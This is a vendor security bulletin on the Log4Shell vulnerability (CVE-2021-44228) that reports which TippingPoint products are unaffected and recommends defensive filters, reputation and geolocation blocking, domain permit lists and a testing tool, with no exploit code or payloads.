Views:
Security Bulletin: 1091

Subject: Trend Micro TippingPoint Security Advisory for CVE-2021-44228

Date of Announcement: December 16, 2021

Summary:

On December 9, 2021, a new critical 0-day vulnerability impacting multiple versions of the popular Apache Log4j 2 logging library was publicly disclosed that, if exploited, could result in Remote Code Execution (RCE) by logging a certain string on affected installations.

Further details on this vulnerability can be found at: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228

For the latest details on using TippingPoint and other Trend Micro products to combat this threat, please see the following article: https://success.trendmicro.com/solution/000289940

Product Impact:

Trend Micro's TippingPoint products TPS, vTPS, SMS, and vSMS are not affected by the zero-day vulnerability CVE-2021-44228. Neither TPS nor vTPS include Java log4j software. The version of Java log4j software used in SMS and vSMS is not vulnerable. We will continue to dive deeper into this vulnerability and provide you with updates about our findings.

Recommend Actions:

#1. What filters should I look at?
 
Trend Micro's Threat Research team has released filter "40627: HTTP: JNDI Injection in HTTP Request" with Digital Vaccine #9621.

Trend Micro recommends customers enable this filter in a block and notify posture for optimal coverage. Starting with Digital Vaccines released on 12/21/2021, it will be enabled by default. Since it may not be enabled in your environment, Trend Micro strongly recommends you confirm the filter is enabled in your policy.

#2. What other controls can be used to disrupt the attack?
 
This attack is successful when the exploit is used to initiate a transfer of a malicious attack payload. In addition to filter #40627, the following techniques can disrupt that chain.


Geolocation

Geolocation filtering can be used to reduce possible attack vectors. Geolocation filtering can block inbound and outbound connections to any specified country, which may limit the ability for attackers to exploit the environment. In cases where a business only operates in certain regions of the globe, proactively blocking other countries may be advisable.


For TippingPoint IPS, TPS, and vTPS products

Trend Micro also recommends enabling DNS and URL reputation as a proactive means of securing an environment from this vulnerability. Leveraging Trend Micro's rapidly evolving threat intelligence, TippingPoint appliances can help disrupt the chain of attack destined to known malicious hosts.

Additionally, Reputation filtering can be leveraged to block Anonymous proxies that are commonly used in exploit attempts. Any inbound or outbound connections to/from an anonymous proxy or anonymizer service can be blocked by configuring a reputation filter with "Reputation DV Exploit Type" set to "Tor Exit" to a Block action.


For Cloud One – Network Security

Anonymous proxies are also an independent, configurable "region" that can be selected as part of Geolocation filtering. This will block any inbound or outbound connection to/from an anonymous proxy or anonymizer service, which can be commonly used as part of exploit attempts.

Domain filtering can also be used to limit the attack vectors and disrupt the attack chain used to exploit this vulnerability. In this case, any outbound connection over TCP is dropped unless the domain being accessed is on a permit list. If the attacker's domain, e.g., http://attacker.com, is not on the permit list, then it would be blocked by default, regardless of the IPS filter policy.

#3 The "Trend Micro Log4j Vulnerability Tester" can test your internet-facing services
 
Trend Micro Research has created a quick web-based testing tool that can help users and administrators identify server applications that may be affected but the Log4Shell vulnerability.

The tool can be found at: https://log4j-tester.trendmicro.com/
Comments (0)